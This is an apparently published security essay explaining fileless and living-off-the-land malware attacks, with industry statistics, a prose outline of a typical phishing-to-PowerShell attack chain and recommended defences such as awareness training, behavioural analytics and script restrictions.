Visible to the public SoS Musings #46 - The Battle Against Fileless Malware Attacks ContinuesConflict Detection Enabled

SoS Musings #46 -

The Battle Against Fileless Malware Attacks Continues

As organizations adopt more advanced attack detection and prevention methods, cybercriminals continue to increase the sophistication of their attack methods. Today's adversaries are increasingly adopting fileless attack techniques to circumvent most security protections. Fileless malware attacks, also known as zero-footprint attacks or non-malware attacks, differ from many other malware threats in that they do not require attackers to install software on a victim's machine. Instead, fileless malware attacks are executed by taking control of tools, software, and applications already installed on the victim's machine, making them increasingly stealthy and capable of evading detection by most security solutions. As such attacks do not rely on files and leave no footprint, they are significantly more challenging to identify and remove. According to a Ponemon Institute report, fileless attacks are ten times more likely to succeed than file-based attacks. The cybersecurity and defense company Trend Micro revealed a 265 percent increase in fileless malware attacks in the first half of 2019 compared to that of 2018. A recent analysis of telemetry data from Cisco found that the most common critical-severity cybersecurity threat faced by endpoints in the first half of 2020 was fileless malware. One of the more dangerous examples of fileless malware is Emotet, a significantly advanced Trojan that can extract banking credentials, passwords to administrative accounts, and more, for cybercriminals to steal money or gain access to other key resources. ESET's latest "Cybersecurity Trends" report predicts that fileless attack methods will be used in highly sophisticated and larger-scale attacks in 2021. Fileless malware attacks call for the development, adoption, and exploration of advanced detection and prevention strategies.

A fileless malware attack is categorized as a Low-Observable Characteristics (LOC) attack. It is a type of stealth attack that poses a challenge in detection for most security solutions. Unlike traditional malware, fileless malware is not written to disk. Instead, fileless malware operates only in a computer's Random Access Memory (RAM), leaving no traces of its existence as nothing is ever written directly to the hard drive. The absence of traditional footprints adds an extra layer of difficulty in the performance of forensic analysis that would help security teams investigate a breach and prevent future attacks. Fileless malware attacks are a subset of Living-off-the-Land (LotL) attacks in which threat actors use trusted pre-installed system tools to hide their malicious activity. There are more than 100 Windows system tools that cybercriminals can exploit in the performance of LotL attacks.

PowerShell is a default Microsoft Windows tool commonly leveraged in fileless malware attacks. Windows PowerShell is a command-line shell and scripting language that has unrestricted access to the Windows operating system and provides unprecedented access to a machine's inner functions. As PowerShell is a built-in component of Windows, it has a high level of trust among administrators and is used to automate tasks across multiple machines and to manage configuration. Other tools and components commonly abused for fileless attacks include Windows Management Instrumentation (WMI), PsExec, BITSAdmin, MSIExec, RegSvr32, CertUtil, Task Scheduler, and Microsoft Office macros. As with most cyberattacks, fileless malware attacks are often initiated through the performance of social engineering. A common fileless malware attack scenario starts with a user being tricked into clicking on a malicious link in a spam or phishing email. The user is then taken to a malicious website requiring Flash to display its content. The malicious website loads Flash, containing vulnerabilities, on the user's computer. Flash opens PowerShell to execute instructions through the command line while it runs in memory. PowerShell then downloads and executes a script from a Command-and-Control (C&C) server that finds and sends the user's data to the attacker.

Fileless malware attacks often rely on human weaknesses to start. As a fileless malware attack typically begins with a phishing email, it is important to increase awareness about how to recognize and avoid phishing scams. According to data analyzed by Atlas VPN, Google registered 2.02 million phishing websites in 2020, representing a 19.91 percent increase from 2019 when the volume of malicious sites reached 1.69 million. Based on data collected during the global "2020 Gone Phishing Tournament" organized by Terranova Security and Microsoft, almost one-fifth of employees click on phishing email links despite having gone through security training. The study showed that the number of employees who clicked on a phishing link despite security training grew by 77 percent, increasing from 11.2 percent in 2019 to 19.8% in 2020. A study by the USENIX Association and a team of researchers from several German universities suggests that organizations should require employees to go through phishing awareness training at least once every six months to prevent the effects of such training from fading. The study also found that video-based and interactive training formats were the most effective in reminding employees about phishing and social engineering attacks. As the number of phishing attacks continues to grow, thus increasing the likelihood of a fileless malware attack, it is important to adopt solutions toward preventing the success of phishing.

Cybersecurity experts have recommended that organizations adopt a multilayered or defense-in-depth approach to combating fileless attacks. Adopting or implementing solutions for analyzing, detecting, and improving user and system behavior is essential to combatting fileless attacks. In addition to increasing security awareness among users, organizations can adopt User and Entity Behavior Analytics (UEBA) to help stop a fileless malware attack. Traditional file-based security monitoring tools detect malware based on disk scans, signatures, or rules, thus making them ineffective at detecting fileless malware. UEBA applies behavioral modeling and machine learning to identify anomalous and suspicious behaviors or entities, presenting an opportunity to detect fileless malware threats. UEBA solutions can help identify and track typical and unusual behaviors across users, hosts, software, and applications. The detection of anomalous activities through a UEBA tool could help pick up the performance of fileless malware attacks. The cybersecurity software company Trend Micro recommends the use of custom sandboxes, along with Intrusion Detection and Prevention Systems (IDPS), to help pick up on C&C communication, data exfiltration, and other suspicious traffic. Other methods recommended for organizations to combat fileless attacks include applying policies that restrict the use of scripts and scripting languages, allowing scripts to run just from read-only network locations, limiting the use of interactive PowerShell within the organization, scanning macro scripts, and applying the latest security updates to the operating system. Fighting fileless malware attacks also requires additional research and novel solution developments. For example, a team of researchers analyzed ten recently-emerged fileless cyberattacks to find out the characteristics and specific techniques used in the attacks. The researchers then divided the number of each type of technique used in a specific fileless cyberattack by the total number of available techniques, resulting in the identification and analysis of each ratio across three different dimensions. This process led to the classification of fileless cyberattacks into the following categories: evasion, attack, or collection. The researchers expect the study to provide a foundational framework for identifying and classifying the characteristics of fileless cyberattacks that are likely to appear in the future, thus contributing to potential response strategies. The battle against fileless malware attacks requires more training, multiple layers of security controls, and additional research.